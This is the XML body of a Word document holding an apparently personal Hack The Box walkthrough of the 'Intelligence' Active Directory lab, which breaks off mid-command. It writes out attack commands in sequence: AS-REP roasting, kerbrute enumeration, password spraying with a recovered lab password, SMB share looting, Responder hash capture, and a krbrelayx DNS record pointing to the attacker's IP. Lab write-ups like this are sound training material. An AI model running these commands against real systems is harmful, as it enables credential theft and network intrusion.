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6A" w:rsidRDefault="00CD1D5D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7188EC9F" wp14:editId="2B5B2604">
            <wp:extent cx="5943600" cy="3141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4A" w:rsidRDefault="00355C4A"/>
    <w:p w:rsidR="00355C4A" w:rsidRDefault="00355C4A" w:rsidP="00355C4A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355C4A" w:rsidRDefault="00355C4A" w:rsidP="00355C4A">
      <w:r>
        <w:t>└─# nmap -A -v -T4 -Pn 10.10.10.248</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D45958" w:rsidRDefault="00D45958" w:rsidP="00355C4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54AFD195" wp14:editId="0722D1BF">
            <wp:extent cx="5943600" cy="3584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F1" w:rsidRDefault="00C90BF1" w:rsidP="00355C4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20467AB4" wp14:editId="5152CE87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B7" w:rsidRDefault="00EF74B7" w:rsidP="00355C4A"/>
    <w:p w:rsidR="00EF74B7" w:rsidRDefault="00EF74B7" w:rsidP="00EF74B7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EF74B7" w:rsidRDefault="00EF74B7" w:rsidP="00EF74B7">
      <w:r>
        <w:t>└─# echo 10.10.10.248 dc.intelligence.htb intelligence.htb &gt; /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00061D50" w:rsidRDefault="00061D50" w:rsidP="00EF74B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="348230BC" wp14:editId="5521DC23">
            <wp:extent cx="557212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A6" w:rsidRDefault="009353A6" w:rsidP="00EF74B7"/>
    <w:p w:rsidR="009353A6" w:rsidRDefault="000C5A88" w:rsidP="00EF74B7">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="009353A6" w:rsidRPr="00647A11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://intelligence.htb/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FA4CFF" w:rsidRDefault="00FA4CFF" w:rsidP="00EF74B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00656C49" wp14:editId="73E60FDA">
            <wp:extent cx="5943600" cy="312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42" w:rsidRDefault="000C5A88" w:rsidP="00EF74B7">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="007A1042" w:rsidRPr="00647A11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://intelligence.htb/documents/2020-01-01-upload.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009F0E3F" w:rsidRDefault="009F0E3F" w:rsidP="00EF74B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51643324" wp14:editId="20734160">
            <wp:extent cx="5943600" cy="2797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7C" w:rsidRDefault="000C5A88" w:rsidP="00EF74B7">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00EC6B7C" w:rsidRPr="00647A11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://intelligence.htb/documents/2020-12-15-upload.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B02C0F" w:rsidRDefault="00B02C0F" w:rsidP="00EF74B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D9078A2" wp14:editId="20CB3B5B">
            <wp:extent cx="5943600" cy="2880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00" w:rsidRDefault="004D4D00" w:rsidP="004D4D00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4D4D00" w:rsidRDefault="004D4D00" w:rsidP="004D4D00">
      <w:r>
        <w:t xml:space="preserve">└─# wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00647A11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://intelligence.htb/documents/2020-01-01-upload.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="004D4D00" w:rsidRDefault="004D4D00" w:rsidP="004D4D00"/>
    <w:p w:rsidR="004D4D00" w:rsidRDefault="004D4D00" w:rsidP="004D4D00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4D4D00" w:rsidRDefault="004D4D00" w:rsidP="004D4D00">
      <w:r>
        <w:t xml:space="preserve">└─# wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00CD0F54" w:rsidRPr="00647A11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://intelligence.htb/documents/2020-12-15-upload.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CD0F54" w:rsidRDefault="00CD0F54" w:rsidP="004D4D00"/>
    <w:p w:rsidR="00B02C0F" w:rsidRDefault="009B25D8" w:rsidP="00EF74B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05F42CAA" wp14:editId="7B847A1C">
            <wp:extent cx="5943600" cy="1679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D8" w:rsidRDefault="009B25D8" w:rsidP="00EF74B7"/>
    <w:p w:rsidR="00A81C9B" w:rsidRDefault="00A81C9B" w:rsidP="00A81C9B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2241FD" w:rsidRDefault="00A81C9B" w:rsidP="00A81C9B">
      <w:r>
        <w:t>└─# exiftool 2020-01-01-upload.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A81C9B" w:rsidRDefault="00D52EC5" w:rsidP="00A81C9B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44AB7903" wp14:editId="641CC59C">
            <wp:extent cx="4876800" cy="2752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C5" w:rsidRDefault="00D52EC5" w:rsidP="00A81C9B"/>
    <w:p w:rsidR="00E06AC6" w:rsidRDefault="00E06AC6" w:rsidP="00E06AC6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E06AC6" w:rsidRDefault="00E06AC6" w:rsidP="00E06AC6">
      <w:r>
        <w:t>└─# exiftool 2020-12-15-upload.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E06AC6" w:rsidRDefault="00274B18" w:rsidP="00E06AC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C8CAE3E" wp14:editId="1BA9AB98">
            <wp:extent cx="4743450" cy="2752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18" w:rsidRDefault="00274B18" w:rsidP="00E06AC6"/>
    <w:p w:rsidR="001D766D" w:rsidRDefault="00780D93" w:rsidP="00E06AC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        </w:rPr>
        <w:t>Now we have two potential usernames. Let’s see if they are “AS-REP Roastable”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00780D93" w:rsidRDefault="00CB4FC8" w:rsidP="00E06AC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F54251C" wp14:editId="36C39F82">
            <wp:extent cx="319087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8" w:rsidRDefault="00CB4FC8" w:rsidP="00E06AC6"/>
    <w:p w:rsidR="00174417" w:rsidRDefault="00174417" w:rsidP="00174417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174417" w:rsidRDefault="00174417" w:rsidP="00174417">
      <w:r>
        <w:t>└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile users.txt -dc-ip 10.10.10.248 -no-pass intelligence.htb/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00174417" w:rsidRDefault="00A12944" w:rsidP="00174417">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB21F04" wp14:editId="35EDD220">
            <wp:extent cx="5943600" cy="622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44" w:rsidRDefault="000C5A88" w:rsidP="00174417">
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="005C5569" w:rsidRPr="003C48BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/ropnop/kerbrute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008E14C3" w:rsidRDefault="008E14C3" w:rsidP="008E14C3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5C5569" w:rsidRDefault="008E14C3" w:rsidP="008E14C3">
      <w:r>
        <w:t>└─# kerbrute -dc-ip 10.10.10.248 -domain intelligence.htb -users users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E14C3" w:rsidRDefault="00516E9D" w:rsidP="008E14C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2149DA8F" wp14:editId="05EFE5DE">
            <wp:extent cx="5943600" cy="1298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90" w:rsidRDefault="00423F90" w:rsidP="00423F90">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>They are valid, but we have reached a dead end.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00423F90" w:rsidRDefault="00423F90" w:rsidP="00423F90">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>Finding more files and usernames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00423F90" w:rsidRDefault="00423F90" w:rsidP="00423F90">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Looking at the PDF filenames (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>2020-01-01-upload.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>2020-12-15-upload.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>), we can guess that maybe there are more files stored in the web server with the same naming convention (namely, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>YYYY-MM-DD-upload.pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00423F90" w:rsidRDefault="00423F90" w:rsidP="00423F90">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>In order to try all possible files within year 2020, I decided to use of a Go script called </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="HTMLCode"/>
            <w:color w:val="357EDD"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>reqPdf.go</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>, which will make all the requests and download the found files in less than a second (detailed explanation </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:anchor="reqPdfgo" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
            <w:color w:val="357EDD"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED6DF0" w:rsidRDefault="000C5A88" w:rsidP="00ED6DF0">
      <w:hyperlink r:id="rId28" w:anchor="reqPdfgo" w:history="1">
        <w:r w:rsidR="00ED6DF0" w:rsidRPr="003C48BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/7Rocky/HackTheBox-scripts/tree/main/Machines/Intelligence#reqPdfgo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00516E9D" w:rsidRDefault="00516E9D" w:rsidP="008E14C3"/>
    <w:p w:rsidR="00811457" w:rsidRDefault="00811457" w:rsidP="00811457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811457" w:rsidRDefault="00811457" w:rsidP="00811457">
      <w:r>
        <w:t>└─# cat reqPdf.go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00811457" w:rsidRDefault="00B114BF" w:rsidP="00811457">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07220EA8" wp14:editId="13AA9F63">
            <wp:extent cx="4476750" cy="51640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3285" cy="5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BF" w:rsidRDefault="00CD42DB" w:rsidP="00811457">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33FEA9C3" wp14:editId="29CF9683">
            <wp:extent cx="5943600" cy="6026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A9" w:rsidRDefault="001F61A9" w:rsidP="00A01C5A"/>
    <w:p w:rsidR="00A01C5A" w:rsidRDefault="00A01C5A" w:rsidP="00A01C5A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CD42DB" w:rsidRDefault="00A01C5A" w:rsidP="00A01C5A">
      <w:r>
        <w:t>└─# go run reqPdf.go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01C5A" w:rsidRDefault="00961343" w:rsidP="00A01C5A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4222E732" wp14:editId="0C46EA4B">
            <wp:extent cx="4276725" cy="781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43" w:rsidRDefault="00961343" w:rsidP="00A01C5A"/>
    <w:p w:rsidR="00954011" w:rsidRDefault="00954011" w:rsidP="00A01C5A"/>
    <w:p w:rsidR="00954011" w:rsidRDefault="00954011" w:rsidP="00954011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954011" w:rsidRDefault="00954011" w:rsidP="00954011">
      <w:r>
        <w:t>└─# exiftool *.pdf | grep Creator | awk '{ print $3 }' | sort -u | tee users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B37DAD" w:rsidRDefault="00F70EA1" w:rsidP="008E14C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB407C6" wp14:editId="05DE232D">
            <wp:extent cx="5943600" cy="4601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A1" w:rsidRDefault="00F70EA1" w:rsidP="008E14C3"/>
    <w:p w:rsidR="004505B9" w:rsidRDefault="004505B9" w:rsidP="004505B9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4505B9" w:rsidRDefault="004505B9" w:rsidP="004505B9">
      <w:r>
        <w:t xml:space="preserve">└─# kerbrute -dc-ip 10.10.10.248 -domain intelligence.htb -users users.txt  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004505B9" w:rsidRDefault="00005A6D" w:rsidP="004505B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FCC6E6A" wp14:editId="6D0EEF5A">
            <wp:extent cx="5943600" cy="543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6D" w:rsidRDefault="00005A6D" w:rsidP="004505B9"/>
    <w:p w:rsidR="00FE7FD5" w:rsidRDefault="00F1523C" w:rsidP="004505B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C81852E" wp14:editId="1F81A061">
            <wp:extent cx="5943600" cy="30645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3C" w:rsidRDefault="00143D59" w:rsidP="004505B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5770D943" wp14:editId="1B0EAD22">
            <wp:extent cx="5943600" cy="25253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59" w:rsidRDefault="00143D59" w:rsidP="004505B9"/>
    <w:p w:rsidR="00A15B8E" w:rsidRDefault="00A15B8E" w:rsidP="00A15B8E">
      <w:r>
        <w:t>password of: NewIntelligenceCorpUser9876</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B37DAD" w:rsidRDefault="00B37DAD" w:rsidP="008E14C3"/>
    <w:p w:rsidR="00C76FFB" w:rsidRDefault="00C76FFB" w:rsidP="00C76FFB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B37DAD" w:rsidRDefault="00C76FFB" w:rsidP="00C76FFB">
      <w:r>
        <w:t>└─# crackmapexec smb 10.10.10.248 -u users.txt -p 'NewIntelligenceCorpUser9876'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00780D93" w:rsidRDefault="00780D93" w:rsidP="00E06AC6"/>
    <w:p w:rsidR="00C76FFB" w:rsidRDefault="00C12596" w:rsidP="00E06AC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63391258" wp14:editId="4F97771F">
            <wp:extent cx="5943600" cy="23012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96" w:rsidRDefault="00E43826" w:rsidP="00E06AC6">
      <w:r>
        <w:t xml:space="preserve">We get the username: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E43826" w:rsidRDefault="00E43826" w:rsidP="00E06AC6">
      <w:r w:rsidRPr="00E43826">
        <w:t>intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820B9D" w:rsidRDefault="00820B9D" w:rsidP="00E06AC6"/>
    <w:p w:rsidR="0068182F" w:rsidRDefault="0068182F" w:rsidP="0068182F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E43826" w:rsidRDefault="0068182F" w:rsidP="0068182F">
      <w:r>
        <w:t xml:space="preserve">└─# crackmapexec smb 10.10.10.248 -u Tiffany.Molina </w:t>
      </w:r>
      <w:r w:rsidR="00F11805">
        <w:t>-p NewIntelligenceCorpUser9876 --</w:t>
      </w:r>
      <w:r>
        <w:t>shares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068182F" w:rsidRDefault="00684E66" w:rsidP="0068182F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7163D4BD" wp14:editId="25A3800F">
            <wp:extent cx="5943600" cy="11798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66" w:rsidRDefault="00684E66" w:rsidP="0068182F"/>
    <w:p w:rsidR="00585B42" w:rsidRDefault="00585B42" w:rsidP="00585B42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746E0C" w:rsidRDefault="00585B42" w:rsidP="00585B42">
      <w:r>
        <w:t>└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 -r Users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00585B42" w:rsidRDefault="005B480A" w:rsidP="00585B42">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1141B7F6" wp14:editId="3421CA53">
            <wp:extent cx="5943600" cy="18973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44" w:rsidRDefault="00B32944" w:rsidP="00B32944">
      <w:r>
        <w:lastRenderedPageBreak/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5B480A" w:rsidRDefault="00B32944" w:rsidP="00B32944">
      <w:r>
        <w:t>└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 --download 'Users\Tiffany.Molina\Desktop\user.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B32944" w:rsidRDefault="008572A5" w:rsidP="00B32944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="208FF977" wp14:editId="07D4246F">
            <wp:extent cx="5943600" cy="407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A5" w:rsidRDefault="008572A5" w:rsidP="00B32944"/>
    <w:p w:rsidR="008572A5" w:rsidRDefault="000F232D" w:rsidP="00B32944">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C776736" wp14:editId="7C4A2F95">
            <wp:extent cx="3038475" cy="5524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2D" w:rsidRDefault="000F232D" w:rsidP="00B32944"/>
    <w:p w:rsidR="00451D6C" w:rsidRDefault="00451D6C" w:rsidP="00451D6C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451D6C" w:rsidRDefault="00451D6C" w:rsidP="00451D6C">
      <w:r>
        <w:t>└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 -r IT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00451D6C" w:rsidRDefault="007B7629" w:rsidP="00451D6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D54A0A7" wp14:editId="656901E8">
            <wp:extent cx="5943600" cy="1295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29" w:rsidRDefault="007B7629" w:rsidP="00451D6C"/>
    <w:p w:rsidR="00707070" w:rsidRDefault="00707070" w:rsidP="00707070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707070" w:rsidRDefault="00707070" w:rsidP="00707070">
      <w:r>
        <w:t>└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 --download 'IT\downdetector.ps1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00707070" w:rsidRDefault="00010EF1" w:rsidP="00707070">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="122E534E" wp14:editId="5C917352">
            <wp:extent cx="5943600" cy="4559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F1" w:rsidRDefault="00010EF1" w:rsidP="00707070"/>
    <w:p w:rsidR="003140A5" w:rsidRDefault="003140A5" w:rsidP="003140A5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3140A5" w:rsidRDefault="003140A5" w:rsidP="003140A5">
      <w:r>
        <w:t>└─# cat 10.10.10.248-IT_downdetector.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003140A5" w:rsidRDefault="00DC2A30" w:rsidP="003140A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10E7A7B8" wp14:editId="6F9C93C4">
            <wp:extent cx="5943600" cy="10375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D9" w:rsidRDefault="00CF25D9" w:rsidP="00CF25D9">
      <w:r>
        <w:lastRenderedPageBreak/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CF4410" w:rsidRDefault="00CF25D9" w:rsidP="00CF25D9">
      <w:r>
        <w:t>└─# responder -I tun0 –wrf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF25D9" w:rsidRDefault="002571F3" w:rsidP="00CF25D9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44C9AF73" wp14:editId="7795B3FA">
            <wp:extent cx="4591050" cy="6772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93" w:rsidRDefault="00780D93" w:rsidP="00E06AC6"/>
    <w:p w:rsidR="00515C0A" w:rsidRDefault="00515C0A" w:rsidP="00515C0A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B76966" w:rsidRDefault="00515C0A" w:rsidP="00515C0A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">└─# git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="000251E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/dirkjanm/krbrelayx.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00515C0A" w:rsidRDefault="00515C0A" w:rsidP="00515C0A"/>
    <w:p w:rsidR="006527D7" w:rsidRDefault="006527D7" w:rsidP="006527D7"/>
    <w:p w:rsidR="006527D7" w:rsidRDefault="006527D7" w:rsidP="006527D7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6527D7" w:rsidRDefault="006527D7" w:rsidP="006527D7">
      <w:r>
        <w:t xml:space="preserve">└─# cd krbrelayx  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00613ABB" w:rsidRDefault="00613ABB" w:rsidP="00613ABB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/krbrelayx]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006527D7" w:rsidRDefault="00613ABB" w:rsidP="00613ABB">
      <w:r>
        <w:t>└─# ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008021F9" w:rsidRDefault="008021F9" w:rsidP="008021F9"/>
    <w:p w:rsidR="00613ABB" w:rsidRDefault="00FF3E35" w:rsidP="008021F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6758EB1C" wp14:editId="3BDFE921">
            <wp:extent cx="5943600" cy="23736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6" w:rsidRDefault="000A2786" w:rsidP="000A2786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/krbrelayx]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3E35" w:rsidRDefault="000A2786" w:rsidP="000A2786">
      <w:r>
        <w:t>└─# python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.</w:t>
      </w:r>
      <w:r w:rsidR="00F4202F">
        <w:t>intelligence.htb' -d 10.10.14.12</w:t>
      </w:r>
      <w:r>
